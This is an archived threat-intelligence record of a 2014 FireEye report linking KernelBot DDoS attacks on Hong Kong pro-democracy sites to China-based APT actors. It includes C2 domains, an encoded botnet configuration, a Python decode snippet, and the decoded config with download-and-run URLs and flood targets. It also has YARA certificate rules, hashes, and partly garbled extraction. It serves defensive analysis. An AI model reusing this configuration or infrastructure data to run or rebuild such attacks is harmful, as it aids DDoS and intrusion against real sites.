{ "id": "55c680d4-0f93-4c4d-bf9a-74164c598a15", "created_at": "2026-04-06T00:07:56.087069Z", "updated_at": "2026-04-10T03:35:29.215609Z", "deleted_at": null, "sha1_hash": "89c38c1e9b5b22f82a35e22d4e1b1f277a69e05c", "title": "Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 148316, "plain_text": "Operation Poisoned Handover: Unveiling Ties Between APT\r\nActivity in Hong Kong’s Pro-Democracy Movement\r\nBy by Ned Moran, Mike Scott, Mike Oppenheim | Threat Intelligence\r\nPublished: 2014-11-03 · Archived: 2026-04-05 23:35:04 UTC\r\nThreat Research\r\nNovember 03, 2014 |\r\nAs the pro-democracy movement in Hong Kong has continued, we’ve been watching for indications of\r\nconfrontation taking place in cyberspace. Protests began in September and have continued to escalate.\r\nIn recent weeks, attackers have launched a series of Distributed Denial of Service attacks (DDoS) against websites\r\npromoting democracy in Hong Kong. According to the Wall Street Journal, websites belonging to Next Media’s\r\nApple Daily publication have suffered from an ongoing DDoS attack that “brought down its email system for\r\nhours”. According to other reports, Next Media’s network has suffered a “total failure” as a result of these attacks.\r\nAdditionally, at least one member of the popular online forum HKGolden was arrested for posting messages\r\nencouraging support for the OccupyCentral Pro Democracy movement.\r\nThe use of DDoS attacks as a political tool during times of conflict is not new; patriotic hacktivist groups\r\nfrequently use them as a means to stifle political activity of which they disapprove. The question of state\r\nsponsorship (or at least tacit approval) in online crackdowns is often up for debate and ambiguous from a\r\ntechnical evidence and tradecraft perspective.\r\nIn this case, however, we’ve discovered an overlap in the tools and infrastructure used by China-based advanced\r\npersistent threat (APT) actors and the DDoS attack activity. We believe that these DDoS attacks are linked to\r\npreviously observed APT activity, including Operation Poisoned Hurricane. This correlation sheds light on the\r\npotential relationships, symbiosis and tool sharing between patriotic hacker activities designed to disrupt anti-government activists in China, and the APT activity we consistently see that is more IP theft and espionage-focused.\r\nOngoing DDoS Attacks Target the Pro-Democracy Movement\r\nFireEye has identified a number of binaries coded to receive instructions from a set of command and control (C2)\r\nservers instructing participating bots to attack Next Media-owned websites and the HKGolden forum. Next Media\r\nis a large media company in Hong Kong and the HkGolden forum has been used as a platform to organize pro-democracy protests. Each sample we identified is signed with digital certificates that have also been used by APT\r\nhttps://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html\r\nPage 1 of 18\n\nactors to sign binaries in previous intrusion operations:\r\nThese binaries are W32 Cabinet self-extracting files that drop a variant of an older DDoS tool known as\r\nKernelBot . All of the samples we identified have the “NewVersion” value of 20140926. Structurally, all of these\r\nsamples are similar in that they drop three files:\r\n• ctfmon.exe-a legitimate, signed copy of the Pidgin IM client\r\n (md5 hash = 1685f978149d7ba8e039af9a4d5803c7)\r\n• libssp-0.dll–malware DLL which is side-loaded by ctfmon.exe\r\n to decode and launch KernelBot. Most versions of this dll are also\r\n signed by either the QTI or CallTogether certificate.\r\n• readme.txt – a binary file which contains the XOR-encoded\r\n KernelBot DLL as well as C2 destination information (most have\r\n md5 hash of b5ac964a74091d54e091e68cecd5b532)\r\nThe KernelBot implants receive targeting instructions from C2 servers hard-coded directly into the sample. For\r\nexample, c3d6450075d618b1edba17ee723eb3ca drops a KernelBot variant that connects to both www.sapporo-digital-photoclub[.]com and wakayamasatei[.]com. The full list of C2 servers we identified is as follows:\r\nsapporo-digital-photoclub[.]com\r\nwakayamasatei[.]com\r\nhttps://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html\r\nPage 2 of 18\n\ntommo[.]jp\r\nmizma.co[.]jp\r\nsp.you-maga[.]com\r\nnitori-tour[.]com\r\nninekobe[.]com\r\nshinzenho[.]jp\r\nwizapply[.]com\r\nwww.credo-biz[.]com\r\nOn Oct. 21, the control server at wakayamasatei[.]com responded with the following encoded configuration file:\r\n@$@cWFPWERPRnlPXl5DRE13JyBjWXhPWkVYXnleS15PFxonIGNZbkVdRGxDRk\r\n94X0QaFxonIGlHTmNuGhcbJyBuRV1EbENGT3hfRH9YRhoXQl5eWhAFBRsaBBo\r\nEGwQbHxsFGwRPUk8nIHF/Wk5LXk95T1hcT1h3JyBkT118T1hZQ0VEFxgaGx4\r\naExgcJyB/Wk5LXk9sQ0ZPf1hGF0JeXloQBQUbGgQaBBsEGx8bBRsET1JPJyBx\r\nbm5leXViRVleeV5LXkNZXkNJWXcnIGlFX0Ref1hGFycgfkNHT1gXGCcgcW5uZ\r\nXl1eUlYQ1pebEZFRU53JyBjWXlJWENaXmxGRUVOFxsnIGlHTmNuFxsYGScgeU\r\nhttps://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html\r\nPage 3 of 18\n\nlYQ1pebEZFRU5uZHkXJyB5SVhDWl5sRkVFTn9YRhdCXl5aEAUFRFJLWkMES1p\r\naRk9OS0NGUwRJRUcEQkEFJyB5SVhDWl5sRkVFTnpFWF4XEhonIGNZbU9ef1hG\r\nbENGTxcbJyBjWXlPRE56S0lBT14XGicgfkJYT0tOZkVFWn5DR08XHycgfkJYT\r\n0tOaUVfRF4XGxonIH5DR09YFxkcGicgY1l+Q0dPWBcbJyBxbm5leXV5SVhDWl\r\n5sRkVFTnVrG3cnIGNZeUlYQ1pebEZFRU4XGicgaUdOY24XGycgeUlYQ1pebEZ\r\nFRU5uZHkXGxoEGgQbBBsfGycgeUlYQ1pebEZFRU5/WEYXGxoEGgQbBBsfGwUb\r\nBEJeR0YnIHlJWENaXmxGRUVOekVYXhcSGicgY1ltT15/WEZsQ0ZPFxsnIGNZe\r\nU9ETnpLSUFPXhcbJyB+QlhPS05mRUVafkNHTxcbJyB+QlhPS05pRV9EXhcbJy\r\nB+Q0dPWBcYGicgY1l+Q0dPWBcbJyBxbm5leXV/TlpsRkVFTncnIGNZf05abEZ\r\nFRU4XGicgaUdOY24XGycgf05abEZFRU5uZHkXGxoEGgQbBBsfGycgfkJYT0tO\r\naUVfRF4XGycgfkNHT1gXGBonIGNZfkNHT1gXGycgcW5uZXl1f05abEZFRU51a\r\nxt3JyBjWX9OWmxGRUVOFxonIGlHTmNuFxsnIH9OWmxGRUVObmR5FxsaBBoEGw\r\nQbHxsnIH5CWE9LTmlFX0ReFxsnIH5DR09YFxgaJyBjWX5DR09YFxsnIHFubmV\r\n5dXlTRGxGRUVOdycgY1l5U0RsRkVFThcaJyBpR05jbhcbJyB5U0RsRkVFTm5k\r\nhttps://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html\r\nPage 4 of 18\n\neRcbGgQaBBsEGx8bJyB5U0RsRkVFTnpFWF4XEhonIH5CWE9LTmlFX0ReFxsnI\r\nH5DR09YFxgaJyBjWX5DR09YFxsnIHFubmV5dX5JWmxGRUVOdycgY1l+SVpsRk\r\nVFThcaJyBpR05jbhcbJyB+SVpsRkVFTm5keRcbGgQaBBsEGx8bJyB+SVpsRkV\r\nFTnpFWF4XEhonIGNZeU9ETnpLSUFPXhcbJyB+QlhPS05pRV9EXhcbJyB+Q0dP\r\nWBcYGicgY1l+Q0dPWBcbJyBxbm5leXV+SVpsRkVFTnVrG3cnIGNZfklabEZFR\r\nU4XGicgaUdOY24XGycgfklabEZFRU5uZHkXGxoEGgQbBBsfGycgfklabEZFRU\r\n56RVheFxIaJyBjWXlPRE56S0lBT14XGycgfkJYT0tOaUVfRF4XHCcgfkNHT1g\r\nXGBonIGNZfkNHT1gXGycg@$@\r\nThis configuration file can be decoded by stripping the leading and trailing @$@ characters. At this point, a\r\nsimple base64 and XOR decode will reveal the plaintext configuration. The following snippet of python code can\r\nbe used to decode this command:\r\nb64encoded = request.content.rstrip('@$@').lstrip('@$@')\r\nb64decoded = b64encoded.decode(\"base64\")\r\ncommand = \"\"\r\nfor c in b64decoded:\r\nx = ord(c)\r\nhttps://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html\r\nPage 5 of 18\n\nx = x ^ XOR_key\r\ncommand += chr(x)\r\nFireEye has observed two different single-byte XOR keys used to encode configuration files issued by the DDOS\r\nC2 servers in this campaign. The two different keys are 0x2A or 0x7E. The encoded configuration file shown\r\nabove decodes to:\r\n[KernelSetting]\r\nIsReportState=0\r\nIsDownFileRun0=0\r\nCmdID0=1\r\nDownFileRunUrl0=http://10.0.1.151/1.exe\r\n[UpdateServer]\r\nNewVersion=20140926\r\nUpdateFileUrl=http://10.0.1.151/1.exe\r\n[DDOS_HostStatistics]\r\nCountUrl=\r\nTimer=2\r\nhttps://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html\r\nPage 6 of 18\n\n[DDOS_ScriptFlood]\r\nIsScriptFlood=1\r\nCmdID=123\r\nScriptFloodDNS=\r\nScriptFloodUrl=http://nxapi.appledaily.com.hk/\r\nScriptFloodPort=80\r\nIsGetUrlFile=1\r\nIsSendPacket=0\r\nThreadLoopTime=5\r\nThreadCount=10\r\nTimer=360\r\nIsTimer=1\r\n[DDOS_ScriptFlood_A1]\r\nIsScriptFlood=0\r\nhttps://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html\r\nPage 7 of 18\n\nCmdID=1\r\nScriptFloodDNS=10.0.1.151\r\nScriptFloodUrl=10.0.1.151/1.html\r\nScriptFloodPort=80\r\nIsGetUrlFile=1\r\nIsSendPacket=1\r\nThreadLoopTime=1\r\nThreadCount=1\r\nTimer=20\r\nIsTimer=1\r\n[DDOS_UdpFlood]\r\nIsUdpFlood=0\r\nCmdID=1\r\nUdpFloodDNS=10.0.1.151\r\nThreadCount=1\r\nhttps://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html\r\nPage 8 of 18\n\nTimer=20\r\nIsTimer=1\r\n[DDOS_UdpFlood_A1]\r\nIsUdpFlood=0\r\nCmdID=1\r\nUdpFloodDNS=10.0.1.151\r\nThreadCount=1\r\nTimer=20\r\nIsTimer=1\r\n[DDOS_SynFlood]\r\nIsSynFlood=0\r\nCmdID=1\r\nSynFloodDNS=10.0.1.151\r\nSynFloodPort=80\r\nhttps://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html\r\nPage 9 of 18\n\nThreadCount=1\r\nTimer=20\r\nIsTimer=1\r\n[DDOS_TcpFlood]\r\nIsTcpFlood=0\r\nCmdID=1\r\nTcpFloodDNS=10.0.1.151\r\nTcpFloodPort=80\r\nIsSendPacket=1\r\nThreadCount=1\r\nTimer=20\r\nIsTimer=1\r\n[DDOS_TcpFlood_A1]\r\nIsTcpFlood=0\r\nCmdID=1\r\nhttps://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html\r\nPage 10 of 18\n\nTcpFloodDNS=10.0.1.151\r\nTcpFloodPort=80\r\nIsSendPacket=1\r\nThreadCount=6\r\nTimer=20\r\nIsTimer=1\r\nDuring the course of our research, we’ve observed more than 30 different unique configuration files issued by the\r\nC2 servers listed above. These configurations issued commands to attack the following domains and IPs:\r\nnxapi.appledaily.com[.]hk\r\n202.85.162.90\r\n58.64.139.10\r\n202.85.162.97\r\n202.85.162.81\r\n198.41.222.6\r\n202.85.162.101\r\nhttps://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html\r\nPage 11 of 18\n\n202.85.162.95\r\n202.85.162.180\r\n202.85.162.140\r\n202.85.162.130\r\n124.217.214.149\r\nAll of the above IPs host Next Media or Apple daily websites, with the exception of 58.64.139.10 and\r\n124.217.214.149. The IP 58.64.139.10 has hosted hkgolden[.]com - the domain for the HKGolden forum\r\nmentioned above.\r\nFor approximately 14 hours between October 23rd and 24th, the attackers pushed a configuration update to four\r\ncontrols servers that instructed bots under their control to flood 124.217.214.149 with UDP traffic. The IP\r\n124.217.214.149 hosted the attacker controlled domain p.java-sec[.]com.\r\nOn Oct. 23, 2014, two of the active controls began instructing participating bots to cease attacks. By Oct. 24,\r\n2014, all five of the known active control servers were issuing commands to cease the attacks.\r\nIt should come as no surprise that hkgolden[.]com, nextmedia[.]com, and appledaily.com[.]hk websites are now or\r\npreviously have been blocked by the Great Firewall of China – indicating that the PRC has found the content\r\nhosted on these sites objectionable.\r\nLinks to Previous Activity\r\nThe most direct connection between these DDoS attacks and previous APT activity is the use of the QTI\r\nInternational and CallTogether code signing certificates, which we have seen in malware attributed to APT\r\nactivity.\r\nThe QTI International digital certificate has been previously used to sign binaries used in APT activity including\r\nOperation Poisoned Hurricane. Specifically, 17bc9d2a640da75db6cbb66e5898feb1 is a PlugX variant signed by\r\nthe QTI International certificate. This PlugX variant connected to a Google Code project at\r\ncode.google[.]com/p/udom/, where it decoded a command that configured its C2 server.\r\nThe sample 0b54ae49fd5a841970b98a078968cb6b was signed with the QTI International certificate as well. This\r\nsample was first observed during a drive-by attack in June 2014, and was downloaded from java-se[.]com/jp.jpg.\r\nhttps://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html\r\nPage 12 of 18\n\nThis sample is detected as Backdoor.APT.Preshin and connected to luxscena[.]com for C2.\nThe QTI International certificate was also used to sign e2a4b96cce9de4fb126cfd5f5c73c3ed. We detect this\npayload as Backdoor.APT.PISCES and it used hk.java-se[.]com for C2. The java-se[.]com website was previously\nused in other attacks targeting the pro-democracy movement in Hong Kong. We first observed the presence of\nmalicious javascript inserted into Hong Kong Association for Democracy and People's Livelihood on June 26,\n2014, which appeared as the following:\n[More recently, as noted by Claudio Guarnieri, the website of the Democratic Party of Hong Kong was seen hosting a redirect to the same malicious javascript. The CallTogether certificate has been used to sign ecf21054ab515946a812d1aa5c408ca5. We also detect this payload as Backdoor.APT.PISCES and observed it connect to u.java-se[.]com. Both of these certificates are valid but can be detected and blocked via the following Yara signatures: rule callTogether_certificate { meta: author = \"Fireeye Labs\" version = \"1.0\" reference_hash = \"d08e038d318b94764d199d7a85047637\" description = “detects binaries signed with the CallTogether certificate” strings: https://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html Page 13 of 18](http://www.adpl.org.hk/?p=2680 \"抗議九巴加價要求凍結加價、改善服務\n\")\n\n$serial = {452156C3B3FB0176365BDB5B7715BC4C}\r\n $o = \"CallTogether, Inc.\"\r\n condition:\r\n $serial and $o\r\n}\r\nrule qti_certificate\r\n{\r\n meta:\r\n author = \"Fireeye Labs\"\r\n reference_hash = \"cfa3e3471430a0096a4e7ea2e3da6195\"\r\n description = \"detects binaries signed with the QTI International Inc certificate\"\r\n strings:\r\n $cn = \"QTI International Inc\"\r\n $serial = { 2e df b9 fd cf a0 0c cb 5a b0 09 ee 3a db 97 b9 }\r\nhttps://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html\r\nPage 14 of 18\n\ncondition:\r\n $cn and $serial\r\n}\r\nThese ongoing DDoS attacks and previous APT intrusion activity both target the hkgolden[.]com website. As\r\nnoted above, this site has been targeted with a DDoS attack by a KernelBot network. We also found that the\r\nhkgolden[.]com website was compromised on Sept. 5, 2014 and had a redirect to a malicious javascript again\r\nhosted at another jave-se[.]com host.\r\nFinally, as noted above the IP 124.217.214.149 was seen hosting the domain p.java-sec[.]com between Oct. 25,\r\n2014 and Oct. 27, 2014. As Brandon Dixon noted here, the java-sec[.]com domain is linked to the java-se[.]com\r\nby shared hosting history at the following IP address:\r\n124.248.237.26\r\n223.29.248.9\r\n211.233.89.182\r\n112.175.143.2\r\n112.175.143.9\r\nIt is unclear why these actors would attack an IP address they were actively using. It’s possible that the attackers\r\nwanted to test their botnet’s capability by attacking an IP they were using to gather statistics on the size of the\r\nattack. It is also possible that the attackers simply made a mistake and accidentally issued commands to attack\r\ntheir own infrastructure. On Oct. 24, 2014, after attacking their own infrastructure, the attackers issued new\r\ninstructions to their botnet that ceased all attacks.\r\nConclusion\r\nhttps://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html\r\nPage 15 of 18\n\nWhile not conclusive, the evidence presented above shows a link between confirmed APT activity and\r\nongoing DDoS attacks that appear to be designed to silence the Pro Democracy movement in Hong Kong.\r\nThe evidence does not conclusively prove that the same actors responsible for the DDoS attacks are also behind\r\nthe observed intrusion activity discussed above – such as Operation Poisoned Hurricane. Rather, the evidence may\r\nindicate that a common quartermaster supports both the DDoS attacks and ongoing intrusion activity.\r\nIn either scenario, there is a clear connection between the intrusion activity documented in Operation Poisoned\r\nHurricane and the DDOS attacks documented here. While the tactics of these activities are very different from a\r\ntechnical perspective, each supports distinct political objectives. Operation Poisoned Hurricane’s objective\r\nappeared to have in part been IP theft possibly for economic gain or other competitive advantages. In the DDOS\r\nattacks, the objective was to silence free speech and suppress the pro democracy movement in Hong Kong. The\r\nChinese government is the entity most likely to be interested in achieving both of these objectives.\r\nAPPENDIX\r\nMD5s\r\nc3d6450075d618b1edba17ee723eb3ca\r\nd08e038d318b94764d199d7a85047637\r\n84bd0809b1dbc2dc86f30d30faaa7e4e\r\n39bb90140fc0101f49377b6c60076f9d\r\ncaa5529010c17b969da01ade084794c6\r\n17bc9d2a640da75db6cbb66e5898feb1\r\n0b54ae49fd5a841970b98a078968cb6b\r\ne2a4b96cce9de4fb126cfd5f5c73c3ed\r\necf21054ab515946a812d1aa5c408ca5\r\nhttps://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html\r\nPage 16 of 18\n\nHOSTNAMES\r\ntommo[.]jp\r\nmizma.co[.]jp\r\nsp.you-maga[.]com\r\nnitori-tour[.]com\r\nninekobe[.]com\r\nshinzenho[.]jp\r\nwizapply[.]com\r\nwww.credo-biz[.]com\r\nwww.sapporo-digital-photoclub[.]com\r\nwakayamasatei[.]com\r\nluxscena[.]com\r\njava-se[.]com\r\nhk.java-se[.]com\r\nu.java-se[.]com\r\njre76.java-se[.]com\r\nhttps://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html\r\nPage 17 of 18\n\np.java-sec[.]com\r\nSource: https://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-un\r\nveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html\r\nhttps://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html\r\nPage 18 of 18\n\nstrings: $cn = \"QTI International Inc\" \n$serial = { 2e df b9 fd cf a0 0c cb 5a b0 09 ee 3a db 97 b9 }\n Page 14 of 18", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "references": [ "https://web.archive.org/web/20201127180357/https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html" ], "report_names": [ "operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html" ], "threat_actors": [ { "id": "42a6a29d-6b98-4fd6-a742-a45a0306c7b0", "created_at": "2022-10-25T15:50:23.710403Z", "updated_at": "2026-04-10T02:00:05.281246Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "Whisper Spider" ], "source_name": "MITRE:Silence", "tools": [ "Winexe", "SDelete" ], "source_id": "MITRE", "reports": null }, { "id": "eb5915d6-49a0-464d-9e4e-e1e2d3d31bc7", "created_at": "2025-03-29T02:05:20.764715Z", "updated_at": "2026-04-10T02:00:03.851829Z", "deleted_at": null, "main_name": "GOLD WYMAN", "aliases": [ "Silence " ], "source_name": "Secureworks:GOLD WYMAN", "tools": [ "Silence" ], "source_id": "Secureworks", "reports": null }, { "id": "722b693d-cfdc-489e-a540-78c7d52ac5a8", "created_at": "2022-10-25T16:07:23.713768Z", "updated_at": "2026-04-10T02:00:04.7232Z", "deleted_at": null, "main_name": "Hurricane Panda", "aliases": [ "Operation Poisoned Hurricane" ], "source_name": "ETDA:Hurricane Panda", "tools": [ "CHINACHOPPER", "China Chopper", "Mimikatz", "SinoChopper" ], "source_id": "ETDA", "reports": null }, { "id": "88e53203-891a-46f8-9ced-81d874a271c4", "created_at": "2022-10-25T16:07:24.191982Z", "updated_at": "2026-04-10T02:00:04.895327Z", "deleted_at": null, "main_name": "Silence", "aliases": [ "ATK 86", "Contract Crew", "G0091", "TAG-CR8", "TEMP.TruthTeller", "Whisper Spider" ], "source_name": "ETDA:Silence", "tools": [ "EDA", "EmpireDNSAgent", "Farse", "Ivoke", "Kikothac", "LOLBAS", "LOLBins", "Living off the Land", "Meterpreter", "ProxyBot", "ReconModule", "Silence.Downloader", "TiniMet", "TinyMet", "TrueBot", "xfs-disp.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434076, "ts_updated_at": 1775792129, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/89c38c1e9b5b22f82a35e22d4e1b1f277a69e05c.pdf", "text": "https://archive.orkl.eu/89c38c1e9b5b22f82a35e22d4e1b1f277a69e05c.txt", "img": "https://archive.orkl.eu/89c38c1e9b5b22f82a35e22d4e1b1f277a69e05c.jpg" } }